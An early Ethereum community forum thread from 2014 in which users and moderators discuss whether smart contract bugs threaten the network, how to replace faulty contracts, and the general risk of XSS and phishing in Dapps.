There are any risks attack of Dapps?

YIETYYIETY South Korea, DaejonMember Posts: 1
edited August 2014 in Smart Contracts and Dapps
Of course, most of developers involved in ethereum platform want the ecosystem to grow and go mainstream.

However, some mistake in contract code can cause uninteded attak to the platform.

How can we fix it embed in blockchain of ethereum?

Comments

  • HellRazorHellRazor BerlinMember Posts: 99 ✭✭
    As far as I can judge errors in the contracts are less of an issue. If there are bugs that can somehow be exploited they affect only the contract and not the network. But yeah I also wonder if there are buffer overflows possible so that one could change the contract storage???? But, because the before mentioned attack only affects the contract directly and the user only passively, in my opinion so far XSS seems to be a much bigger risk in DAPPs as it can target the user directly. For example, if there is a forum software where the posts get loaded via swarm I could easily inject javascript code into the ethereum browser and steal the private keys of the user or just send the ether directly to my address. I guess the app developer needs to implement correct parsing of external content in his Dapp, right? Or are there plans to prevent those kind of issues?
  • StephanTualStephanTual London, EnglandMember, Moderator Posts: 1,282 mod
    YIETY said:

    However, some mistake in contract code can cause uninteded attak to the platform.

    Erm, no. A bug in a contract is just that: a bug in a contract, which will then not do what it was intended to do.
    YIETY said:

    How can we fix it embed in blockchain of ethereum?

    If you have a written a bug in your code, then you'd do the same you'd do in any other programming platform: the solution is to fix the bug and republish a new contract, then suicide the old one.

    If you need to preserve a public address to your user base, then namereg is your friend, or you could proxy the contract address via another, updatable contract that just acts as a passthrough.


  • JasperJasper Eindhoven, the NetherlandsMember Posts: 514 ✭✭✭
    Well, you cant just add a suicide button to any contract. :)

    DOUG is a system where you have a 'cluster' of contracts, and they call each other via names in the central DOUG contracts. So you can change parts by changing what contract a name refers to. Of course, you want some system to decide what conditions are needed to change something.

    Giving one Ethereum account total control can give you arbitrary conditions, btw, because that account can be a contract that uses some arbitrary condition to decide.
  • HellRazorHellRazor BerlinMember Posts: 99 ✭✭
    @Stephan_Tual‌ What about the javascript injection thing?
  • JasperJasper Eindhoven, the NetherlandsMember Posts: 514 ✭✭✭
    We are aware that javascript should not just be able to send transactions itself like it can now.

    There is potentially a whole range of phishing-like attacks. Something still needs to be developed to combat it. I think for instance, that contract writers might have a way to introduce a sort of 'second opinion' that is run(just on the client) before sending transactions to their contract. The second opinions can do different things like allow it to go through, show its own representation of what the transactions would do, which might even involve calling it a pointless transaction.
  • StephanTualStephanTual London, EnglandMember, Moderator Posts: 1,282 mod
    @HellRazor‌ , yes, XSS attacks are a vector, just like they are on the web today. Don't link up to CDNs you don't trust, and don't package code that's not opensourced and reviewed. The usual warnings that you find for web development today apply here, too :)
  • HellRazorHellRazor BerlinMember Posts: 99 ✭✭
  • GeorgeHallamGeorgeHallam Member, Administrator, Moderator Posts: 229 admin
    It will certainly be a case of making sure any code that is used is completely trusted, reviewed and auditable.

    I believe there are plans within the community to link some of the reputation tracking dapps to a code repository which would be pretty neat :) can't for the life of me find the post now however!
Sign In or Register to comment.